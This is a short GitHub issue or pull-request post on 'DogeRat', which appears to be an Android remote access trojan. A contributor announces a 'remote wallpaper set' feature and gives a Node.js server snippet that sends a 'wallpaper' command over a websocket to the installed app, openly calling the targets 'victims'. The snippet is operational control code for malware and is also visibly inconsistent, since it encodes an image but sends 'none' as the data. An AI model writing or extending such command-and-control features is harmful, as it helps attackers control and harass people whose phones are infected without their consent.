DogeRat icon indicating copy to clipboard operation
DogeRat copied to clipboard

Update AppActions.kt

Open Botsailer opened this issue 11 months ago • 2 comments

added the functionality of remote wallpaper set just add this server code to server accordingly:

var data = fs.readFileSync('lol.webp') //replace with actual file path and image name const base64Data = data.toString('base64'); const text = { commands: "wallpaper", //keep it wallpaper as apk will just respond to command "wallpaper" if you want to change victims wallpaper data: "none", }; ws.send(JSON.stringify(text))

Botsailer avatar Aug 13 '23 12:08 Botsailer